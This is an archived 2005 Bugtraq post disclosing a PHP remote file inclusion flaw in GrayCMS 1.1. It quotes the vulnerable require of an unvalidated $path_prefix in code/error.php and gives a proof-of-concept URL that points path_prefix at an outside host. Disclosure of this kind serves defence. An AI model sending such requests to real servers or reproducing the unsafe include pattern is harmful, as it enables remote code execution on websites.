lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 26 Apr 2005 11:45:32 -0000
From: Kold <maggik@...a.net>
To: bugtraq@...urityfocus.com
Subject: GrayCMS php code injection




Version:  1.1
Severity: High
Vendor:   http://gcms.graymur.net/

Vulnerable code is in "code/error.php":

<----begin---->
...
if (!isset($page)) $page = '';
if (!isset($path_prefix)) $path_prefix = '../';
if (empty($main)) {
  require $path_prefix.'code/main.dat';
}
if (isset($e404) or isset($_GET['e404'])) {

...
}
if (isset($e403) or isset($_GET['e403'])) {
...
}

require $path_prefix.'code/blocks.php';
exit;
<----end---->


PoC: 
http://localhost/CMS/gcms/code/error.php?path_prefix=http://www.kiddiehost.com/
 
mail me:    maggik <at> gala <dot> net
icq:        3316667
greetz to:  ghc, 0xdeadbabe, unl0ck & others

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ